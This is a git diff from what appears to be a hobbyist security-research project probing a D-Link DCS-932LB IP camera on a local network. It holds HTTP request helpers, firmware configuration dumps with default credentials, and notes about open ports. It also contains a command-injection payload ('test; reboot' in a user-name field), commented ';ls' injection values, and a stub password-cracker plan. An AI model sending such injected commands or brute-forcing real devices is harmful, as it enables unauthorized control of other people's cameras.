diff --git a/bot.py b/bot.py new file mode 100644 index 0000000..4e2b6f8 --- /dev/null +++ b/bot.py @@ -0,0 +1,110 @@ +#import urllib +# +#password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() +# +#top_level_url = "http://192.168.1.119" +#password_mgr.add_password(None, top_level_url, "admin", "Azerty123") +# +#handler = urllib.request.HTTPBasicAuthHandler(password_mgr) +# +#opener = urllib.request.build_opener(handler) +# +#opener.open("http://192.168.1.119") +# +#urllib.request.install_opener(opener) +# +#temp = urllib.request.urlopen("http://192.168.1.119") + + + + +import urllib.request +import base64 +import requests + + + +def getReq(url, user, passw, headers=None): + try: + req= urllib.request.Request(url) + credentials = ('%s:%s' % (user, passw)) + encoded_credentials = base64.b64encode(credentials.encode('ascii')) + req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) + if headers: + for h in headers: + req.add_header(h[1], h[2]) + with urllib.request.urlopen(req) as response: + return str(response.read()) + except urllib.error.HTTPError as e: + return str(e) + + +def postReq(url, user, passw, data, headers=None): + try: + d = urllib.parse.urlencode(data, quote_via=urllib.parse.quote_plus).encode('utf-8') + req= urllib.request.Request(url) + credentials = ('%s:%s' % (user, passw)) + encoded_credentials = base64.b64encode(credentials.encode('ascii')) + req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) + if headers: + for h in headers: + req.add_header(h[0], h[1]) + print(req.headers) + print(req.get_full_url()) + with urllib.request.urlopen(req) as response: + return str(response.read()) + + except urllib.error.HTTPError as e: + return str(e) + + + + +base_url = "http://192.168.1.119/" +username = "admin" +password = "Azerty123" + +data = { + "ReplySuccessPage":"home.htm", + "ReplyErrorPage":"home.htm", + "WebLanguage":"4", + "ConfigSystemLanguage":"Save" + } + + + + +#headers = { +# "Host": "192.168.1.119", +# "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", +# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", +# "Accept-Language": "en-US,en;q=0.5", +# "Accept-Encoding": "gzip, deflate", +# "Referer": "http://192.168.1.119/home.htm", +# "Content-Type": "application/x-www-form-urlencoded", +# "Content-Length": "87", +# "Connection": "keep-alive", +# "Upgrade-Insecure-Requests": "1" +#} + +headers = [ + ("Host","192.168.1.119"), + ("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"), + ("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"), + ("Accept-Language","en-US,en;q=0.5"), + ("Accept-Encoding","gzip, deflate"), + ("Referer","http://192.168.1.119/home.htm"), + ("Content-Type","application/x-www-form-urlencoded"), + ("Content-Length","87"), + ("Connection","keep-alive"), + ("Upgrade-Insecure-Requests","1") + ] +posturl = "/home.thm" + +print("post request on setSystemLanguage:\n " + postReq("http://192.168.1.119"+posturl,username,password,data, headers)) + +#print("\n\n\n") +#data = {"ReplySuccesPage":";ls","ReplyErrorPage":";ls"} +#posturl = "" +# +#print("post request on index:\n "+postReq(base_url, username, password, data)) diff --git a/conn b/conn new file mode 100644 index 0000000..70e9431 --- /dev/null +++ b/conn @@ -0,0 +1,150 @@ + + + +D-Link Corporation. | WIRELESS INTERNET CAMERA | HOME + + + + + + + + + +
+ + + + + + +
Product: DCS-932LBFirmware version: 2.14  
+
+ + +
+
+ + + + + + + + + + + +
Live VideoSetupMaintenanceStatusHelp
+ + +
+ + + + + +
+ + + + + +
Camera
Logout
+
Language :
+   +
+ +
+ + + +
+
+ +
+

Camera

+ This section shows your IP camera's live video. You can control your settings using the buttons below.
+ Current resolution is 320x240. +
+
+

Function

+ ActiveX  + Java  +
+
+

Live Video

+ + +
+ + + + + + + + +
DCS-932LB
  11-20-2018 04:44:35 PM
+ +
+
+
+ +
+
+
+
+ + + + + + +
+
Copyright , D-Link Corporation / D-Link Systems, Inc. All rights reserved.
+
+
+ + +
+ + + + +
+ +
+ + +
+ + + diff --git a/dissasembleRalinkInit/ralink_init.id0 b/dissasembleRalinkInit/ralink_init.id0 deleted file mode 100644 index ac3153a..0000000 Binary files a/dissasembleRalinkInit/ralink_init.id0 and /dev/null differ diff --git a/dissasembleRalinkInit/ralink_init.nam b/dissasembleRalinkInit/ralink_init.nam deleted file mode 100644 index e69de29..0000000 diff --git a/dlinkHacker/__pycache__/connections.cpython-37.pyc b/dlinkHacker/__pycache__/connections.cpython-37.pyc new file mode 100644 index 0000000..a9ce552 Binary files /dev/null and b/dlinkHacker/__pycache__/connections.cpython-37.pyc differ diff --git a/dlinkHacker/commandInjection.py b/dlinkHacker/commandInjection.py new file mode 100644 index 0000000..3be88f9 --- /dev/null +++ b/dlinkHacker/commandInjection.py @@ -0,0 +1,5 @@ +from connections import * + + + +print(postReq("http://192.168.1.219/setSystemAddUser", "admin", "Azerty123", {"ReplySuccessPage":"advanced.htm", "ReplyErrorPage":"errradv.htm","SessionKey":"1543011420", "UserName": "test; reboot", "Password":"aaaaaaaaaaaaaaa"})) diff --git a/dlinkHacker/connections.py b/dlinkHacker/connections.py new file mode 100644 index 0000000..f4424a0 --- /dev/null +++ b/dlinkHacker/connections.py @@ -0,0 +1,42 @@ + + +import urllib.request +import base64 + + + +def getReq(url, user, passw, headers=None): + try: + req= urllib.request.Request(url) + credentials = ('%s:%s' % (user, passw)) + encoded_credentials = base64.b64encode(credentials.encode('ascii')) + req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) + if headers: + for h in headers: + req.add_header(h[1], h[2]) + with urllib.request.urlopen(req) as response: + return str(response.read()) + except urllib.error.HTTPError as e: + return str(e) + +#format for data {item:content, item:content} +def postReq(url, user, passw, data, headers=None): + try: + d = urllib.parse.urlencode(data, quote_via=urllib.parse.quote_plus).encode('utf-8') + req= urllib.request.Request(url) + credentials = ('%s:%s' % (user, passw)) + encoded_credentials = base64.b64encode(credentials.encode('ascii')) + req.add_header('Authorization', 'Basic %s' % encoded_credentials.decode("ascii")) + if headers: + for h in headers: + req.add_header(h[0], h[1]) + print(req.headers) + print(req.get_full_url()) + with urllib.request.urlopen(req) as response: + return str(response.read()) + + except urllib.error.HTTPError as e: + return str(e) + + + diff --git a/dlinkHacker/hackdlink.py b/dlinkHacker/hackdlink.py new file mode 100644 index 0000000..7eb07a0 --- /dev/null +++ b/dlinkHacker/hackdlink.py @@ -0,0 +1,19 @@ +import sys +#dlinks authentication seems very hard to crack, but i can write a cracker either way +#so parameters for the password, +#between 6 and 20 chars long +#numbers characters (upper and lower case) and a bunch of symbols +#encoded in base64 +#i'"ve written a get request in a connection manager if i get an httpError, i can actually check if it's a bad password +from connections import * + +l = "abcdefghijklmnopqrstuvwxyz" +L = l.upper() +n = "1234567890" +c = "&é@#'(è!çà){}-_+=%£,.:;" +if len(sys.argv): + print("") +else: + print("") + +print(getReq("http://192.168.1.119/image/jpeg.cgi", "", "")) diff --git a/dlinkHacker/tests.py b/dlinkHacker/tests.py new file mode 100644 index 0000000..e5085f5 --- /dev/null +++ b/dlinkHacker/tests.py @@ -0,0 +1,69 @@ +#import urllib +# +#password_mgr = urllib.request.HTTPPasswordMgrWithDefaultRealm() +# +#top_level_url = "http://192.168.1.119" +#password_mgr.add_password(None, top_level_url, "admin", "Azerty123") +# +#handler = urllib.request.HTTPBasicAuthHandler(password_mgr) +# +#opener = urllib.request.build_opener(handler) +# +#opener.open("http://192.168.1.119") +# +#urllib.request.install_opener(opener) +# +#temp = urllib.request.urlopen("http://192.168.1.119") + + + +from connections import * + +base_url = "http://192.168.1.215/" +username = "admin" +password = "Azerty123" + +data = { + "ReplySuccessPage":"home.htm", + "ReplyErrorPage":"home.htm", + "WebLanguage":"4", + "ConfigSystemLanguage":"Save" + } + + + + +#headers = { +# "Host": "192.168.1.119", +# "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0", +# "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", +# "Accept-Language": "en-US,en;q=0.5", +# "Accept-Encoding": "gzip, deflate", +# "Referer": "http://192.168.1.119/home.htm", +# "Content-Type": "application/x-www-form-urlencoded", +# "Content-Length": "87", +# "Connection": "keep-alive", +# "Upgrade-Insecure-Requests": "1" +#} + +headers = [ + ("Host","192.168.1.119"), + ("User-Agent","Mozilla/5.0 (X11; Linux x86_64; rv:64.0) Gecko/20100101 Firefox/64.0"), + ("Accept","text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8"), + ("Accept-Language","en-US,en;q=0.5"), + ("Accept-Encoding","gzip, deflate"), + ("Referer","http://192.168.1.119/home.htm"), + ("Content-Type","application/x-www-form-urlencoded"), + ("Content-Length","87"), + ("Connection","keep-alive"), + ("Upgrade-Insecure-Requests","1") + ] +posturl = "/home.thm" + +print("post request on setSystemLanguage:\n " + postReq("http://192.168.1.119"+posturl,username,password,data, headers)) + +#print("\n\n\n") +#data = {"ReplySuccesPage":";ls","ReplyErrorPage":";ls"} +#posturl = "" +# +#print("post request on index:\n "+postReq(base_url, username, password, data)) diff --git a/etc_ro.Wireless.RT2860AP.RT2869_default_vlan b/etc_ro.Wireless.RT2860AP.RT2869_default_vlan new file mode 100644 index 0000000..d05da60 --- /dev/null +++ b/etc_ro.Wireless.RT2860AP.RT2869_default_vlan @@ -0,0 +1,564 @@ +#The word of "Default" must not be removed +Default +WebInit=1 +#WiFiTest=0 +#HostName=ralink +#Login=admin +#Password=admin +OperationMode=0 +Platform=RT5350 +Telnet=0 +CountryRegion=5 +CountryRegionABand=7 +CountryCode=NA +#wanConnectionMode=DHCP +#wan_ipaddr=192.168.1.1 +#wan_netmask=255.255.255.0 +#wan_gateway=192.168.1.254 +#wan_primary_dns=192.168.1.5 +#wan_secondary_dns=168.95.1.1 +#wan_pppoe_user=pppoe_user +#wan_pppoe_pass=pppoe_passwd +#wan_l2tp_server=l2tp_server +#wan_l2tp_user=l2tp_user +#wan_l2tp_pass=l2tp_passwd +#wan_l2tp_mode=0 +#wan_l2tp_ip=192.168.1.1 +#wan_l2tp_netmask=255.255.255.0 +#wan_l2tp_gateway=192.168.1.254 +#wan_pptp_server=pptp_server +#wan_pptp_user=pptp_user +#wan_pptp_pass=pptp_passwd +#wan_pptp_mode=0 +#wan_pptp_ip=192.168.1.1 +#wan_pptp_netmask=255.255.255.0 +#wan_pptp_gateway=192.168.1.254 +#lan_ipaddr=2.65.87.200 +#lan_netmask=255.0.0.0 +#dhcpEnabled=0 +#dhcpStart=10.10.10.100 +#dhcpEnd=10.10.10.200 +#dhcpMask=255.255.255.0 +#dhcpPriDns=10.10.10.251 +#dhcpSecDns=168.95.1.1 +#dhcpGateway=10.10.10.254 +#dhcpLease=86400 +#stpEnabled=0 +#lltdEnabled=0 +#igmpEnabled=0 +#natEnabled=0 +#IPPortFilterEnable=0 +#IPPortFilterRules= +#PortForwardEnable=0 +#PortForwardRules= +#MacFilterEnable=0 +#MacFilterRules= +#DefaultFirewallPolicy=1 +#DMZEnable=0 +#DMZIPAddress= +#TZ= +#NTPServerIP= +#NTPSync= +#DDNSProvider= +#DDNS= +#DDNSAccount= +#DDNSPassword= +BssidNum=1 +#SSID1=RT305x_AP_andy +#WirelessMode=9 +#TxRate=0 +#Channel=6 +BasicRate=15 +#BeaconPeriod=100 +DtimPeriod=1 +TxPower=100 +DisableOLBC=0 +BGProtection=0 +#TxAntenna= +#RxAntenna= +#TxPreamble=0 +RTSThreshold=2347 +FragThreshold=2346 +TxBurst=1 +PktAggregate=1 +#TurboRate=0 +WmmCapable=1 +APAifsn=3;7;1;1 +APCwmin=4;4;3;2 +APCwmax=6;10;4;3 +APTxop=0;0;94;47 +APACM=0;0;0;0 +BSSAifsn=3;7;2;2 +BSSCwmin=4;4;3;2 +BSSCwmax=10;10;4;3 +BSSTxop=0;0;94;47 +BSSACM=0;0;0;0 +AckPolicy=0;0;0;0 +APSDCapable=0 +DLSCapable=0 +NoForwarding=0 +NoForwardingBTNBSSID=0 +#HideSSID=0 +ShortSlot=1 +AutoChannelSelect=0 +#SecurityMode=0 +#VLANEnable=0 +#VLANName= +#VLANID=0 +#VLANPriority=0 + +######################################### +# Cannot remove these WscXXX Parameters # +######################################### +WscConfMode=0 +WscConfStatus=2 +WscAKMP=1 +WscConfigured=0 +WscModeOption=0 +WscActionIndex=9 +WscPinCode= +WscRegResult=1 +WscUseUPnP=1 +WscUseUFD=0 +WscSSID=RalinkInitialAP +WscKeyMGMT=WPA-EAP +WscConfigMethod=138 +WscAuthType=1 +WscEncrypType=1 +WscNewKey=scaptest + +IEEE8021X=0 +IEEE80211H=0 +CSPeriod=6 +PreAuth=0 +#AuthMode=OPEN +#EncrypType=NONE +RekeyInterval=3600 +RekeyMethod=DISABLE +PMKCachePeriod=10 +#WPAPSK1=12345678 +#DefaultKeyID=1 +#Key1Type=0 +#Key1Str1= +#Key2Type=0 +#Key2Str1= +#Key3Type=0 +#Key3Str1= +#Key4Type=0 +#Key4Str1= +#HSCounter=0 +HT_HTC=0 +HT_RDG=0 +#HT_LinkAdapt=0 +HT_OpMode=0 +HT_MpduDensity=5 +HT_EXTCHA=1 +#HT_BW=0 +HT_AutoBA=1 +HT_BADecline=0 +HT_AMSDU=0 +HT_BAWinSize=64 +HT_GI=1 +HT_STBC=1 +HT_MCS=33 +HT_PROTECT=1 +#HT_MIMOPS=3 +HT_40MHZ_INTOLERANT=0 +HT_TxStream=1 +HT_RxStream=1 +#NintendoCapable=0 +#AccessPolicy0=0 +#AccessControlList0= +#AccessPolicy1=0 +#AccessControlList1= +#AccessPolicy2=0 +#AccessControlList2= +#AccessPolicy3=0 +#AccessControlList3= +#WdsEnable=0 +#WdsEncrypType=NONE +#WdsList= +#WdsKey= +WirelessEvent=0 +RADIUS_Server= +RADIUS_Port=1812 +RADIUS_Key= +#RADIUS_Acct_Server= +#RADIUS_Acct_Port=1813 +#RADIUS_Acct_Key= +session_timeout_interval=0 +#idle_timeout_interval=0 +#staWirelessMode=9 +################################### +## ED CCA Profile ## +################################### +EDCCA_AP_STA_TH=1 +EDCCA_AP_AP_TH=1 +EDCCA_STA_SCANED_AP_TH=5 +EDCCA_STA_CURRENT_CH_APS_TH=1 +EDCCA_STA_RSSI_TH=-100 +EDCCA_ED_TH=90 +EDCCA_FALSE_CCA_TH=180 +EDCCA_BLOCK_CHECK_TH=2 +################################### +### IPCam Default Configuration ### +### Company: D-Link ### +### Model : DCS-930L ### +################################### +# System # +CameraName=DCS-930L +Location= +AdminID=admin +AdminPassword= +LEDControl=0 +SnapshotURLAuthentication=0 +# Date and Time # +DateTimeMode=1 +TimeServerIPAddress= +TimeServerProtocol=0 +TimeZone=0 +TimeZoneIndex=0 +Date=2014-01-01 +Time=00:00:00 +# User Access Control # ### UserValue=UserName/Password/Privilege ### +AccessControlEnable=0 +User1= +User2= +User3= +User4= +User5= +User6= +User7= +User8= +User9= +User10= +User11= +User12= +User13= +User14= +User15= +User16= +User17= +User18= +User19= +User20= +User21= +User22= +User23= +User24= +User25= +User26= +User27= +User28= +User29= +User30= +User31= +User32= +User33= +User34= +User35= +User36= +User37= +User38= +User39= +User40= +User41= +User42= +User43= +User44= +User45= +User46= +User47= +User48= +User49= +User50= +User51= +User52= +User53= +User54= +User55= +User56= +User57= +User58= +User59= +User60= +User61= +User62= +User63= +User64= +# Image # +VideoResolution=1 +CompressionRate=2 +FrameRate=0 +BrightnessControl=64 +ContrastControl=64 +SaturationControl=64 +SharpnessControl=32 +LightFrequency=1 +Mirror=0 +AntiFlickerEnable=0 +ViewMode=0 +VideoResolution264=3 +FrameRate264=30 +BitRate264=8 +# Network # #IP Mode: 1-(Fixed), 4-(DHCP), 5-(PPPoE)# +IPAddressMode=1 +IPAddress=2.65.87.200 +SubnetMask=255.0.0.0 +DefaultGateway= +PPPoEUserID= +PPPoEPassword= +DNSIPAddress1= +DNSIPAddress2= +DDNSEnable=0 +DDNSProvider= +DDNSHostName= +DDNSUserName= +DDNSPassword= +DDNSTimeout=576 +SecondHTTPPortEnable=3 +SecondHTTPPort=80 +UPnPEnable=1 +UPnPPortForwarding=0 +HTTPAuthentication=0 +# Wireless # +ConnectionMode=0 +SSID=Test-WPS-andy +WirelessChannel=6 +TransmissionRate=0 +WEPEncryption=4 +WEPKeyFormat=0 +Key1= +Key2= +Key3= +Key4= +TxKey=1 +BeaconInterval=100 +Preamble=0 +AuthenticationType=2 +PreSharedKey=PSK12345 +WirelessDisable=0 +WirelessMode=0 +WirelessBW=0 +APExtendName=0 +APSSID=Test-Repeater-Andy +APSSIDHidden=0 +APWEPEncryption=0 +APWEPKeyFormat=0 +APKey1= +APAuthenticationType=0 +APPreSharedKey=PSK12345 +APMaxClient=3 +# FTP # +FTPHostAddress= +FTPPortNumber=21 +FTPUserName= +FTPPassword= +FTPDirectoryPath=/ +FTPPassiveMode=0 +FTPScheduleEnable=0 +FTPScheduleMode=0 +FTPScheduleDay= +FTPScheduleTimeStart=00:00:00 +FTPScheduleTimeStop=00:00:00 +FTPScheduleVideoFrequencyMode=0 +FTPScheduleFramePerSecond=1 +FTPScheduleSecondPerFrame=1 +FTPScheduleBaseFileName= +FTPScheduleFileMode=1 +FTPScheduleMaxFileSequenceNumber=1024 +FTPCreateFolderInterval=0 +#FTPManualEnable=0 +#FTPManualBaseFileName= +#FTPManualFileMode= +#FTPManualMaxFileSequenceNumber= +# E-Mail # +EmailSMTPServerAddress= +EmailSMTPPortNumber=25 +EmailSenderAddress= +EmailReceiverAddress= +EmailUserName= +EmailPassword= +EmailTLSAuthentication=0 +EmailScheduleEnable=0 +EmailScheduleMode=0 +EmailScheduleDay= +EmailScheduleTimeStart=00:00:00 +EmailScheduleTimeStop=00:00:00 +EmailScheduleInterval=300 +EmailMotionMode=1 +EmailMotionFrameInterval=1 +#EmailManualEnable=0 +#EmailManualInterval=300 +# Audio # +AudioEnable=1 +AudioVolume=80 +AudioCodec=0 +AudioSampleBit=1 +AudioSampleRate=1 +SpeakerEnable=1 +SpeakerVolume=80 +# MotionDetection # +MotionDetectionEnable=0 +MotionDetectionBlockSet=0000000000000000000000000 +MotionDetectionSensitivity=90 +MotionDetectionScheduleMode=0 +MotionDetectionScheduleDay= +MotionDetectionScheduleTimeStart=00:00:00 +MotionDetectionScheduleTimeStop=00:00:00 +# SoundDetection # +SoundDetectionEnable=0 +SoundDetectionDB=90 +SoundDetectionScheduleMode=0 +SoundDetectionScheduleDay= +SoundDetectionScheduleTimeStart=00:00:00 +SoundDetectionScheduleTimeStop=00:00:00 +# DLink15 # +DLink15Register=0 +DLink15Enable=1 +DLink15Remote=0 +DLink15Argv1=1 +# PanTilt # ### Value=PositionName/Pan/Tilt ### +SetPosition1= +SetPosition2= +SetPosition3= +SetPosition4= +SetPosition5= +SetPosition6= +SetPosition7= +SetPosition8= +SetPosition9= +SetPosition10= +SetPosition11= +SetPosition12= +SetPosition13= +SetPosition14= +SetPosition15= +SetPosition16= +SetPosition17= +SetPosition18= +SetPosition19= +SetPosition20= +SetPosition21= +SetPosition22= +SetPosition23= +SetPosition24= +HomePosition= +PanSingleMoveDegree=5 +TiltSingleMoveDegree=5 +DwellingTime=5 +PatrolTimes=1 +# Web Language # +DefaultLanguage=0 +CurrentLanguage=0 +# Day/Night Mode # +DayNightMode=0 +IRLedScheduleSunStart=00:00 +IRLedScheduleSunEnd=00:00 +IRLedScheduleMonStart=00:00 +IRLedScheduleMonEnd=00:00 +IRLedScheduleTueStart=00:00 +IRLedScheduleTueEnd=00:00 +IRLedScheduleWedStart=00:00 +IRLedScheduleWedEnd=00:00 +IRLedScheduleThuStart=00:00 +IRLedScheduleThuEnd=00:00 +IRLedScheduleFriStart=00:00 +IRLedScheduleFriEnd=00:00 +IRLedScheduleSatStart=00:00 +IRLedScheduleSatEnd=00:00 +# LinknLook # +#LnLEnable=1 +#LnLLLSrvIP=0.0.0.0 +#LnLLLDomain=cam.linknlook.net +#LnLLLAudioCodec=5 +#LnLhid=00000000 +#LnLDbgLevel=0 +#LnLDbgSrvIP=0.0.0.0 +#LnLDbgToken= +#LnLAliasStatus=0 +#LnLAliasName=null +#LnLLastAliasName=null +#LnLPxySrvName=null +#LnLPxySrvPort=8080 +# Facebook # +#FacebookEmail= +# Local Recording # +#LocalRecordPath= +#LocalRecordMaxTime=5 +# SD Card Recording # +#SDCardScheduleEnable=0 +#SDCardScheduleMode=0 +#SDCardScheduleDay= +#SDCardScheduleTimeStart=00:00:00 +#SDCardScheduleTimeStop=00:00:00 +#SDCardScheduleInterval=60 +#SDCardFullAction=0 +#SDCardScheduleEnableVideo=0 +#SDCardScheduleModeVideo=0 +#SDCardScheduleDayVideo= +#SDCardScheduleTimeStartVideo=00:00:00 +#SDCardScheduleTimeStopVideo=00:00:00 +#SDCardMaxRecordTimeVideo=5 +#SDCardFullActionVideo=0 +#SDCardRecordingFormatVideo=0 +# Cifs Recording # +#CifsServerFolder= +#CifsUserName= +#CifsPassword= +#CifsScheduleEnable=0 +#CifsScheduleMode=0 +#CifsScheduleDay= +#CifsScheduleTimeStart=00:00:00 +#CifsScheduleTimeStop=00:00:00 +#CifsMaxRecordTime=5 +#CifsFullAction=0 +# OSD # +OSDEnable=0 +OSDColorY=59 +OSDColorU=99 +OSDColorV=250 +# Bonjour # +BonjourEnable=1 +BonjourName=DCS-930L +# Daylight saving time DST # +DSTEnable=0 +DSTOffset=5 +DSTStartMonth=0 +DSTStartWeek=0 +DSTStartDay=0 +DSTStartTime=0 +DSTEndMonth=0 +DSTEndWeek=0 +DSTEndDay=0 +DSTEndTime=0 +# 3G Internet +#Internet3GAutoConfig=0 +#Internet3GUserName= +#Internet3GPassword= +#Internet3GDialNumber= +#Internet3GAPN= +#Internet3GAuthentication=0 +#Internet3GPINCode= +#Internet3GMTU=1500 +# Upgrade F/W Status +LastDownloadStatus=0 +# FPS Control +FPSEnable=0 +# Low Light Control +LowLightEnable=1 +# H264 Stream Mode +H264StreamMode=1 +# PT Test +PTTestTimer=0 +PTTestResultPanLimit=0 +PTTestResultTiltLimit=0 +PTTestResultPanLost=0 +PTTestResultTiltLost=0 +# SSL Certificate +SSLCertificate1= +SSLCertificate2= +# Light Sensor Control +LightSensorControl=3 +# UPnPuuid +UPnPuuid=ae67e622-7a66-465e-bab0-00ff32654199 diff --git a/network discovery.pcapng b/network discovery.pcapng new file mode 100644 index 0000000..cb5a284 Binary files /dev/null and b/network discovery.pcapng differ diff --git a/readme.md b/readme.md index 7a82b0f..23147db 100644 --- a/readme.md +++ b/readme.md @@ -627,4 +627,13 @@ so this file has to be usefull since it has this set in it, i'm copying it to th +dus +blijkbaar is er een speciale authenticatie via http aanwezig op dit apparaat, en hij wijgert een pak url's die ik probeer om andere shit te starte bv, dus wa ik ga probere, om een cracker te schrijve die alle passwoorden afgaat + + +some ports are also open + +port 80 +port 443 +port 8385 diff --git a/rootdesc.xml b/rootdesc.xml new file mode 100644 index 0000000..14bc3cf --- /dev/null +++ b/rootdesc.xml @@ -0,0 +1 @@ +10http://192.168.1.219:8633urn:schemas-upnp-org:device:Basic:1.0DCS-932LB(192.168.1.219:80)D-Linkhttp://www.dlink.comWireless Internet CameraDCS-932L_Rev_BDCS-932L_Rev_Bhttp://www.dlink.comuuid:ae67e622-7a66-465e-bab0-b0c554462ab2urn:cellvision:service:Null:1urn:cellvision:serviceId:RootNull/rootService.xml/rootControl/rootEventhttp://192.168.1.219:80 \ No newline at end of file diff --git a/safarimitm.pcapng b/safarimitm.pcapng new file mode 100644 index 0000000..ccf05e4 Binary files /dev/null and b/safarimitm.pcapng differ diff --git a/test b/test new file mode 100644 index 0000000..ea2267b --- /dev/null +++ b/test @@ -0,0 +1,150 @@ + + + +D-Link Corporation. | WIRELESS INTERNET CAMERA | HOME + + + + + + + + + +
+ + + + + + +
Product: DCS-932LBFirmware version: 2.14  
+
+ + +
+
+ + + + + + + + + + + +
Live VideoSetupMaintenanceStatusHelp
+ + +
+ + + + + +
+ + + + + +
Camera
Logout
+
Language :
+   +
+ +
+ + + +
+
+ +
+

Camera

+ This section shows your IP camera's live video. You can control your settings using the buttons below.
+ Current resolution is 320x240. +
+
+

Function

+ ActiveX  + Java  +
+
+

Live Video

+ + +
+ + + + + + + + +
DCS-932LB
  11-20-2018 04:01:39 PM
+ +
+
+
+ +
+
+
+
+ + + + + + +
+
Copyright , D-Link Corporation / D-Link Systems, Inc. All rights reserved.
+
+
+ + +
+ + + + +
+ +
+ + +
+ + + diff --git a/dissasembleRalinkInit/ralink_init.id1 b/tests/http:192.168.1.119 similarity index 100% rename from dissasembleRalinkInit/ralink_init.id1 rename to tests/http:192.168.1.119 diff --git a/verb/binary/attemp2/fs/cpio/temp/alphapd b/verb/binary/attemp2/fs/cpio/temp/alphapd new file mode 100755 index 0000000..3ce2112 Binary files /dev/null and b/verb/binary/attemp2/fs/cpio/temp/alphapd differ diff --git a/verb/binary/attemp2/fs/cpio/temp/nvram_daemon b/verb/binary/attemp2/fs/cpio/temp/nvram_daemon new file mode 100755 index 0000000..daa1a92 Binary files /dev/null and b/verb/binary/attemp2/fs/cpio/temp/nvram_daemon differ diff --git a/verb/binary/attemp2/fs/cpio/temp/readme.md b/verb/binary/attemp2/fs/cpio/temp/readme.md new file mode 100644 index 0000000..d6063b6 --- /dev/null +++ b/verb/binary/attemp2/fs/cpio/temp/readme.md @@ -0,0 +1,2 @@ +alphapd seems to be the httpd server + diff --git a/whatthehelldidifind.pcapng b/whatthehelldidifind.pcapng new file mode 100644 index 0000000..39f1082 Binary files /dev/null and b/whatthehelldidifind.pcapng differ diff --git a/wiresharkTelnetCapturePort8385.pcapng b/wiresharkTelnetCapturePort8385.pcapng new file mode 100644 index 0000000..3c4f25d Binary files /dev/null and b/wiresharkTelnetCapturePort8385.pcapng differ